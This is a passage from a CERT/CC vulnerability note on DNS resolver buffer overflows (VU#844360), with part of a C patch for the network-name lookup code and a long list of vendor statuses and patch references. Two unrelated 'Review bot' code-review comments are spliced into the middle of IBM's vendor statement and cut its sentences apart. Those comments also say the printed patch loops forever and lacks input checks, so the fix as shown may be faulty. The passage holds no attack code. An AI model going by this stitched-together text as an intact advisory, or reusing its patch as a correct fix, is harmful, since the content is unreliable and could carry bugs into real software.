\n`+ /* Check each alias name for being of the forms:` \n`+ 4.3.2.1.in-addr.arpa = net 1.2.3.4` \n`+ 3.2.1.in-addr.arpa = net 0.1.2.3` \n`+ 2.1.in-addr.arpa = net 0.0.1.2` \n`+ 1.in-addr.arpa = net 0.0.0.1` \n`+ */` \n`+ uint32_t val = 0; /* Accumulator for n_net value. */` \n`+ unsigned int shift = 0; /* Which part we are parsing now. */` \n`+ const char *p = *ap; /* Consuming the string. */` \n`+ do` \n`+ {` \n`+ /* Match the leading 0 or 0[xX] base indicator. 
*/` \n`+ unsigned int base = 10;` \n`+ if (*p == '0' && p[1] != '.')` \n`+ {` \n`+ base = 8;` \n`+ ++p;` \n`+ if (*p == 'x' || *p == 'X')` \n`+ {` \n`+ base = 16;` \n`+ ++p;` \n`+ if (*p == '.')` \n`+ break; /* No digit here. Give up on alias. */` \n`+ }` \n`+ if (*p == '\\0')` \n`+ break;` \n`+ }` \n`+` \n`+ uint32_t part = 0; /* Accumulates this part's number. */` \n`+ do` \n`+ {` \n`+ if (isdigit (*p) && (*p - '0' < base))` \n`+ part = (part * base) + (*p - '0');` \n`+ else if (base == 16 && isxdigit (*p))` \n`+ part = (part << 4) + 10 + (tolower (*p) - 'a');` \n`+ ++p;` \n`+ } while (*p != '\\0' && *p != '.');` \n`+` \n`+ if (*p != '.')` \n`+ break; /* Bad form. Give up on this name. */` \n`+` \n`+ /* Install this as the next more significant byte. */` \n`+ val |= part << shift;` \n`+ shift += 8;` \n`+ ++p;` \n`+` \n`+ /* If we are out of digits now, there are two cases:` \n`+ 1. We are done with digits and now see \"in-addr.arpa\".` \n`+ 2. This is not the droid we are looking for. */` \n`+ if (!isdigit (*p) && !strcasecmp (p, \"in-addr.arpa\"))` \n`+ {` \n`+ result->n_net = val;` \n`+ return NSS_STATUS_SUCCESS;` \n`+ }` \n`+` \n`+ /* Keep going when we have seen fewer than 4 parts. 
*/` \n`+ } while (shift < 32);` \n`+ }` \n`+ }` \n` break;` \n` }` \n`-` \n`- ++result->n_aliases;` \n`- return NSS_STATUS_SUCCESS;` \n` }` \n \n` __set_h_errno (TRY_AGAIN);`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Hewlett-Packard Company __ Affected\n\nNotified: November 12, 2002 Updated: April 15, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee: SSRT2270, SSRT2322/HPSBUX0303-209\n\n<<http://ftp.support.compaq.com/patches/.new/unix.shtml>>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### IBM __ Affected\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe AIX operating system is vulnerable to the named and DNS resolver issues in releases 4.3.3, 5.1.0 and 5.2.0. 
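Review bot: The added check `if (n < 0 || end_of_message - (cp + n) < QFIXEDSZ)` in the question-skipping hunk (@@ -283,7 +283,15 @@) is only safe because `n < 0` is evaluated first, and nothing in the hunk says so; a short comment above it that a failed `__dn_skipname` must short-circuit before `cp + n` is formed would keep a later reordering from bringing back the out-of-bounds read. Setting NO_RECOVERY and returning NSS_STATUS_UNAVAIL for a truncated question section matches the existing error path further down in the file, so the behaviour itself looks right.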
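Review bot: In the new BYNAME block of the second hunk (@@ -344,64 +352,94 @@) nothing visible advances `ap`: the `while (*ap != NULL)` body ends right after `} while (shift < 32);`, and every `break` inside the parser only leaves the inner `do`, so an alias that is not of the in-addr.arpa form (including the `break; /* No digit here. Give up on alias. */` case) would be re-parsed forever. If a `++ap;` was lost in transcription, ignore this; otherwise it needs adding at the end of the while body. Two smaller points in the same region: the digit loop `do { ... ++p; } while (*p != '\0' && *p != '.')` has no else branch, so a character that is neither a valid digit for `base` nor a hex digit (for example the `9` in an octal `09.in-addr.arpa`) is skipped silently instead of reaching the `/* Bad form. Give up on this name. */` exit, and `part` is never bounded to 255 before `val |= part << shift`, so a part above 255 bleeds into the next byte of n_net; an `else break;` in the digit loop plus an `if (part > 0xff) break;` before the shift would close both. The guard `alias_pointer + 2 < &net_data->aliases[MAX_NR_ALIASES]` drops extra aliases silently, which is acceptable for an overflow fix but deserves a comment so the truncation is not later mistaken for a parsing bug.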
The following APARs are available:\n\n> AIX 4.3.3 APAR IY37088 (available) \n> AIX 5.1.0 APAR IY37091 (available) \n> AIX 5.2.0 APAR IY37289 (available)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### ISC Affected\n\nNotified: October 22, 2002 Updated: November 13, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease reference the \"LIBRESOLV: buffer overrun\" section of the ISC [BIND Vulnerabilities](<http://www.isc.org/products/BIND/bind-security.html>) web page.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### MetaSolv Software Inc. Affected\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nVU#844360 - Domain Name System (DNS) stub resolver libraries vulnerable to buffer overflows via network name or address lookups (VU#852283 - CAN-2002-1219 / VU#229595 - CAN-2002-1220 / VU#581682 - CAN-2002-1221 / VU#844360 - CAN-2002-0029) was addressed in Policy Services 4.2 Service Pack 1 efix 1. The vulnerability can be avoided by upgrading to Policy Services 4.2 Service Pack 1 efix 1 from MetaSolv Policy Services 4.1 and 4.2 (base). The efix includes all ISC sanctioned patches to BIND 8.2.6 to remedy this vulnerability. 
Please contact MetaSolv Global Customer Care [supporthd@metasolv.com](<mailto:supporthd@metasolv.com>) for assistance.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### NetBSD __ Affected\n\nNotified: November 12, 2002 Updated: February 25, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n<<ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-028.txt.asc>>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Openwall GNU/*/Linux __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nBIND 4.9.10-OW2 includes the patch provided by ISC and thus has the two vulnerabilities affecting BIND 4 fixed. Previous versions of BIND 4.9.x-OW patches, if used properly, significantly reduced the impact of the \"named\" vulnerability. The patches are available at their usual location:\n\n<http://www.openwall.com/bind/> \n \nA patch against BIND 4.9.11 will appear as soon as this version is officially released, although it will likely be effectively the same as the currently available 4.9.10-OW2. \n \nIt hasn't been fully researched whether the resolver code in glibc, and in particular on Openwall GNU/*/Linux, shares any of the newly discovered BIND 4 resolver library vulnerabilities. 
Analysis is in progress.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### SGI __ Affected\n\nNotified: November 12, 2002 Updated: December 05, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see SGI Security Advisory [20021201-01-P](<ftp://patches.sgi.com/support/free/security/advisories/20021201-01-P>).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Sun Microsystems Inc. __ Affected\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Solaris DNS resolver library (libresolv(3LIB)) is affected by VU#844360 in the following supported versions of Solaris:\n\nSolaris 2.6 \n \nPatches are being generated for all of the above releases. 
Sun will be publishing a Sun Alert for this issue at the following location shortly: \n \n<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F48818> \n \nThe patches will be available from: \n \n<http://sunsolve.sun.com/securitypatch>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### The SCO Group __ Affected\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nOpenLinux\n\n<<ftp://ftp.sco.com/pub/security/OpenLinux/CSSA-2002-059.0.txt>> \n \nUnixWare 7.1.1 \n<<ftp://ftp.sco.com/pub/updates/UnixWare/CSSA-2003-SCO.2/CSSA-2003-SCO.2.txt>>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Xerox Corporation __ Affected\n\nNotified: November 12, 2002 Updated: April 24, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nA response to this vulnerability is available from our web site: [http://www.xerox.com/security](<http://www.xerox.com/security/>).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### FreeBSD __ Not Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 
\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe FreeBSD libc resolver is not affected by the issues described in VU#844360.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### NcFTP Software __ Not Affected\n\nUpdated: December 05, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNcFTPd Server, NcFTP Client, and LibNcFTP are not affected. We do not use the getnetbyname() or getnetbyaddr() functions in our code.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### OpenBSD Not Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### PADL Software __ Not Affected\n\nNotified: November 14, 2002 Updated: November 14, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nI don't believe nss_ldap is vulnerable. 
We implement our own getnetby*(), but it has nothing to do with the resolver library (except insofar as we support the BIND IRS).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### AT&T Unknown\n\nNotified: November 12, 2002 Updated: April 04, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Alcatel Unknown\n\nNotified: November 12, 2002 Updated: February 25, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nFollowing CERT advisory CA-2002-31 on security vulnerabilities in the ISC BIND implementation, Alcatel has conducted an immediate assessment to determine any impact this may have on our portfolio. A first analysis has shown that the following products (OmniSwitch 6600, 7700, 8800) may be impacted. Customers may wish to contact their support for more details. The security of our customers' networks is of highest priority for Alcatel. 
Therefore we continue to test our product portfolio against potential ISC BIND security vulnerabilities and will provide updates if necessary.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Avaya Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### BlueCat Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Check Point Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, 
comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Cisco Systems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Computer Associates Unknown\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Conectiva Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Cray Inc. __ Unknown\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nCray Inc. 
may be vulnerable and has opened spr 723892 to investigate.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### D-Link Systems Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Data General Unknown\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Debian Unknown\n\nNotified: November 12, 2002 Updated: February 26, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### F5 Networks Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### FreeRADIUS Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Fujitsu Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Funk Software Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this 
vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### GNU adns Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Guardian Digital Inc. Unknown\n\nNotified: November 12, 2002 Updated: April 04, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Intel Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Juniper Networks Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### 
Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### KTH Kerberos __ Unknown\n\nNotified: November 14, 2002 Updated: November 14, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNeither Heimdal nor KTH Kerberos 4 use getnetby*() directly.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Lotus Software Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Lucent Technologies Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional 
information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### MandrakeSoft Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Men&Mice Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### MiT Kerberos Development Team Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Microsoft Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe 
vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### MontaVista Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### NEC Corporation Unknown\n\nNotified: November 12, 2002 Updated: April 04, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Network Appliance Unknown\n\nNotified: November 12, 2002 Updated: April 04, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Nixu Unknown\n\nNotified: 
November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Nokia Unknown\n\nNotified: November 12, 2002 Updated: November 13, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Nominum Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Nortel Networks __ Unknown\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNortel Networks is determining whether NetID or Optivity NMS are potentially affected by the vulnerabilities identified in CERT/CC Advisory CA-2002-31 and will update this Vendor Statement accordingly.\n\n### Vendor Information \n\nThe vendor has not provided us with any 
further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### OpenSSH Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### PuTTY Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Red Hat Inc. 
